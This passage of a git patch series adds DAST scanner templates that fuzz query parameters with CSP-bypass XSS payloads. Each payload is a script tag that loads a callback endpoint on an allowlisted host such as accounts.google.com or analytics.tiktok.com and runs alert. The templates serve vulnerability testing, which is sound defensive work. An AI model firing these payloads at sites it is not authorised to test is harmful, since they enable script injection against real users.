+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "anchor.digitalocean.com"
+          - "script-src"
+        condition: and 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
new file mode 100644
index 00000000000..443dc670aa3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: google-accounts-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Accounts
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L7C21-L7C109
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "accounts.google.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..639b8af052c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: tiktok-analytics-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via TikTok Analytics
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L11C22-L11C115
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,tiktok
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://analytics.tiktok.com/i18n/pixel/sdk.js?sdkid=%22-alert`1`-%22"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "analytics.tiktok.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
new file mode 100644
index 00000000000..46995f26343
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: youku-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Youku ACS
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,youku
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://acs.youku.com/h5/mtop.youku.playlog.open.get/1.0/?jsv=2.6.1&appKey=24679788&t=1734359327631&sign=6b8f8b6abb27c68582606eed336c887d&api=mtop.youku.playlog.open.get&v=1.0&dataType=jsonp&jsonpIncPrefix=headerRecord1734359327618&type=jsonp&callback=alert&data={%22nlid%22%3A%22XlQcF5xQrCcCAWoLKdGqIOhS%22%2C%22uid%22%3A%22%22%2C%22pageLength%22%3A100%2C%22timestamp%22%3A%221734359327617%22%2C%22appKey%22%3A%22qPbb2hfIYugHjMaj%22%2C%22appName%22%3A%22pc%22%2C%22hwClass%22%3A1%2C%22deviceName%22%3A%22web%22%2C%22isPlayController%22%3A1%2C%22ccode%22%3A%220502%22%2C%22clientDrmAbility%22%3A3}"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "acs.youku.com"
+          - "script-src"
+        condition: and 
\ No newline at end of file

From ac20aef99925e7e7034aecaed4f31008a5df6617 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 28 Jan 2025 14:16:22 +0530
Subject: [PATCH 08/10] fix lint

---
 dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
index 58696b4a0e8..3b0a14968b5 100644
--- a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
@@ -44,4 +44,4 @@ http:
         words:
           - "anchor.digitalocean.com"
           - "script-src"
-        condition: and 
\ No newline at end of file
+        condition: and
\ No newline at end of file

From 93fa7a1003c0990ba822ff455a6e4c8b3aacf493 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 28 Jan 2025 14:54:03 +0530
Subject: [PATCH 09/10] fix-issue

---
 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
index 46995f26343..0e02b5cfb9b 100644
--- a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
@@ -44,4 +44,4 @@ http:
         words:
           - "acs.youku.com"
           - "script-src"
-        condition: and 
\ No newline at end of file
+        condition: and

From f5aa19bc28737fa4b5ee590a510749f0c9c8ff14 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 30 Jan 2025 17:46:05 +0530
Subject: [PATCH 10/10] CSP DAST Templates final

---
 .../xss/csp/1688-bebezoo-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/360cn-csp-xss.yaml                | 47 ---------------
 ...p-xss.yaml => aliexpress-acs-csp-xss.yaml} | 38 ++++++++-----
 .../xss/csp/amazon-aax-eu-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/amazon-csp-xss.yaml               | 51 -----------------
 .../xss/csp/app-link-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/baidu-map-api-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/bazaarvoice-api-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/bdimg-apps-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/bing-api-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/cas-criteo-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/cdn-arkoselabs-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/cdn-jsdelivr-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/cdn-shopify-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/cdn-syncfusion-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/cdnjs-cloudflare-csp-xss.yaml     | 55 ++++++++++++++++++
 .../csp/challenges-cloudflare-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/chartbeat-api-csp-xss.yaml        | 55 ++++++++++++++++++
 .../csp/client-api-arkoselabs-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/client-crisp-chat-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/clients1-google-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/code-angularjs-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/commerce-coinbase-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/common-like-naver-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/connect-mail-ru-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/content-akamai-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/cse-google-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/cxense-api-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/d-adroll-csp-xss.yaml             | 55 ++++++++++++++++++
 .../d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/dailymotion-api-csp-xss.yaml      | 55 ++++++++++++++++++
 .../vulnerabilities/xss/csp/dblp-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/demo-matomo-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/dev-virtualearth-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/developer-apple-csp-xss.yaml      | 55 ++++++++++++++++++
 ....yaml => digitalocean-anchor-csp-xss.yaml} | 36 +++++++-----
 ...tation-resources-opendatasoft-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/don-bild-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/dpm-demdex-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/duckduckgo-api-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/dynamic-criteo-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/elysiumwebsite-s3-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/eu-battle-net-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/facebook-api-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/facebook-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/fast-wistia-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/flickr-api-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/forismatic-api-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/forms-hsforms-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/forms-hubspot-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/fwmrm-csp-xss.yaml                | 38 ++++++++-----
 .../xss/csp/geo-moatads-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/geolocation-onetrust-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/getdrip-api-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/gist-github-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/github-api-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/global-apis-naver-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/go-dev-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/go-snyk-csp-xss.yaml              | 55 ++++++++++++++++++
 .../xss/csp/google-accounts-csp-xss.yaml      | 36 +++++++-----
 .../xss/csp/google-ajax-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/google-analytics-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/google-apis-csp-xss.yaml          | 56 ++++++++++++++++++
 .../xss/csp/google-csp-xss.yaml               | 51 -----------------
 .../xss/csp/googleapis-csp-xss.yaml           | 51 -----------------
 .../xss/csp/graph-facebook-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/grubhub-assets-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/gstatic-angular-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/gstatic-csp-xss.yaml              | 47 ---------------
 .../xss/csp/gstatic-recaptcha-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/gum-criteo-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/hatenaapis-bookmark-csp-xss.yaml  | 55 ++++++++++++++++++
 .../xss/csp/hcaptcha-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/help-afterpay-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/ib-adnxs-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/info-cloudflare-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/info-elastic-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/inno-blob-core-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/investor-coinbase-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/ipify-api-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/ipinfo-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/itunes-apple-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/jd-api-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/js-hcaptcha-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/js-smb-ovoenergy-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/kbcprod-service-now-csp-xss.yaml  | 55 ++++++++++++++++++
 .../csp/lghnh-mkt-prod1-adobe-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/lijit-ap-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/linkedin-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/links-disqus-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/livechatinc-api-csp-xss.yaml      | 55 ++++++++++++++++++
 ...-xss.yaml => lpsnmedia-accdn-csp-xss.yaml} | 38 ++++++++-----
 .../xss/csp/lptag-liveperson-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/m-media-amazon-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/mango-buzzfeed-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/maps-api-ssl-google-csp-xss.yaml  | 55 ++++++++++++++++++
 .../xss/csp/maps-google-com-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/maps-google-de-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/maps-google-lv-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/maps-google-ru-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/maps-googleapis-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/marketo-app-sjint-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/mc-yandex-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/meetup-api-csp-xss.yaml           | 55 ++++++++++++++++++
 dast/vulnerabilities/xss/csp/mi-csp-xss.yaml  | 47 ---------------
 .../xss/csp/mi-huodong-csp-xss.yaml           | 55 ++++++++++++++++++
 .../csp/microsoft-translator-api-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/mixpanel-api-csp-xss.yaml         | 55 ++++++++++++++++++
 .../csp/nominatim-openstreetmap-csp-xss.yaml  | 55 ++++++++++++++++++
 .../xss/csp/oamssoqae-ieee-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/olark-api-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/openexchangerates-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/ovoenergy-csp-xss.yaml            | 47 ---------------
 .../xss/csp/page-gitlab-csp-xss.yaml          | 55 ++++++++++++++++++
 .../csp/partner-googleadservices-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/passport-baidu-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/pinterest-api-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/pixel-mathtag-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/pixel-quantserve-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/pixplug-csp-xss.yaml              | 46 ---------------
 .../xss/csp/portal-ayco-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/pubads-doubleclick-csp-xss.yaml   | 55 ++++++++++++++++++
 .../xss/csp/public-api-wordpress-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/qq-c-y-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/query-fqtag-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/r-skimresources-csp-xss.yaml      | 55 ++++++++++++++++++
 ...cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/recaptcha-net-csp-xss.yaml        |  1 +
 .../rentokil-domains-firebaseio-csp-xss.yaml  | 55 ++++++++++++++++++
 .../xss/csp/reveal-clearbit-csp-xss.yaml      | 55 ++++++++++++++++++
 .../vulnerabilities/xss/csp/ring-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/romania-amazon-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/s-fqtag-csp-xss.yaml              | 55 ++++++++++++++++++
 .../xss/csp/s-ytimg-csp-xss.yaml              | 55 ++++++++++++++++++
 .../xss/csp/search-yahoo-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/secure-adnxs-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/secure-gravatar-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/secure-quantserve-csp-xss.yaml    | 55 ++++++++++++++++++
 .../csp/securepubads-doubleclick-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/segapi-quantserve-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/server-ethicalads-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/servicenow-csp-xss.yaml           | 47 ---------------
 .../xss/csp/shop-samsung-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/skype-config-csp-xss.yaml         | 57 +++++++++++++++++++
 .../csp/smartcaptcha-yandexcloud-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/social-yandex-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/sogou-csp-xss.yaml                | 47 ---------------
 .../xss/csp/soundcloud-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/srv-carbonads-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/ssl-gstatic-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/sso-bytedance-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/st3-zoom-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/stackexchange-api-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/static-parastorage-csp-xss.yaml   | 55 ++++++++++++++++++
 .../xss/csp/storage-googleapis-csp-xss.yaml   | 55 ++++++++++++++++++
 .../storemapper-herokuapp-fastly-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/suggest-taobao-csp-xss.yaml       | 55 ++++++++++++++++++
 .../csp/suggestqueries-youtube-csp-xss.yaml   | 55 ++++++++++++++++++
 .../xss/csp/support-zendesk-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/swiftype-api-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/sync-im-apps-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/tagmanager-google-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/tcr9i-openai-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/thehive-shopify-csp-xss.yaml      | 55 ++++++++++++++++++
 .../thiscanbeanything-zendesk-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/tiktok-analytics-csp-xss.yaml     | 34 ++++++-----
 .../xss/csp/translate-google-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/translate-googleapis-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/translate-yandex-csp-xss.yaml     | 55 ++++++++++++++++++
 .../xss/csp/tumblr-api-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/twitter-api-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/twitter-csp-xss.yaml              | 55 ++++++++++++++++++
 ...zp-public-blob-vercel-storage-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/ug-alibaba-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/uk-indeed-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/ulogin-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/unpkg-angular-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/unpkg-hyperscript-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/urs-pbs-csp-xss.yaml              | 55 ++++++++++++++++++
 .../xss/csp/vimeo-csp-xss.yaml                | 55 ++++++++++++++++++
 .../xss/csp/virtualearth-csp-xss.yaml         | 47 ---------------
 .../xss/csp/visitor-pixplug-csp-xss.yaml      | 55 ++++++++++++++++++
 .../visitor-service-tealiumiq-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/vk-api-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/wb-amap-csp-xss.yaml              | 55 ++++++++++++++++++
 .../xss/csp/widget-usersnap-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/widgets-pinterest-csp-xss.yaml    | 55 ++++++++++++++++++
 .../xss/csp/wikipedia-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/wordpress-api-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/wordpress-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/wse-api-here-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/www-ancestrycdn-csp-xss.yaml      | 55 ++++++++++++++++++
 .../xss/csp/www-api-ibm-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/www-bing-csp-xss.yaml             | 55 ++++++++++++++++++
 .../xss/csp/www-blogger-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/www-google-analytics-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/www-google-recaptcha-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/www-google-search-csp-xss.yaml    | 55 ++++++++++++++++++
 .../csp/www-googleapis-blogger-csp-xss.yaml   | 55 ++++++++++++++++++
 .../www-googleapis-customsearch-csp-xss.yaml  | 55 ++++++++++++++++++
 .../xss/csp/www-googletagmanager-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/www-gstatic-angular-csp-xss.yaml  | 55 ++++++++++++++++++
 .../csp/www-gstatic-recaptcha-csp-xss.yaml    | 55 ++++++++++++++++++
 ...sp-xss.yaml => www-meteoprog-csp-xss.yaml} | 38 ++++++++-----
 .../xss/csp/www-microsoft-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/www-paypal-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/www-recaptcha-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/www-reddit-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/www-roblox-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/www-st-csp-xss.yaml               | 55 ++++++++++++++++++
 .../xss/csp/www-yastat-csp-xss.yaml           | 55 ++++++++++++++++++
 .../xss/csp/www-yastatic-csp-xss.yaml         | 55 ++++++++++++++++++
 .../xss/csp/www-youtube-csp-xss.yaml          | 55 ++++++++++++++++++
 .../xss/csp/x-api-csp-xss.yaml                | 55 ++++++++++++++++++
 .../xss/csp/yahoo-ads-yap-csp-xss.yaml        | 55 ++++++++++++++++++
 .../xss/csp/yandex-st-csp-xss.yaml            | 55 ++++++++++++++++++
 .../xss/csp/youku-csp-xss.yaml                | 47 ---------------
 .../xss/csp/youtube-csp-xss.yaml              | 41 +++++++------
 .../xss/csp/yuedust-yuedu-csp-xss.yaml        | 55 ++++++++++++++++++
 ...ugiohmonstrosdeduelo-blogspot-csp-xss.yaml | 55 ++++++++++++++++++
 .../xss/csp/zhike-help-360-csp-xss.yaml       | 55 ++++++++++++++++++
 .../xss/csp/zhuanjia-sogou-csp-xss.yaml       | 55 ++++++++++++++++++
 222 files changed, 11240 insertions(+), 693 deletions(-)
 create mode 100644 dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
 rename dast/vulnerabilities/xss/csp/{aliexpress-csp-xss.yaml => aliexpress-acs-csp-xss.yaml} (51%)
 create mode 100644 dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml
 rename dast/vulnerabilities/xss/csp/{digitalocean-csp-xss.yaml => digitalocean-anchor-csp-xss.yaml} (54%)
 create mode 100644 dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/gist-github-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/github-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/global-apis-naver-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/go-dev-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/go-snyk-csp-xss.yaml
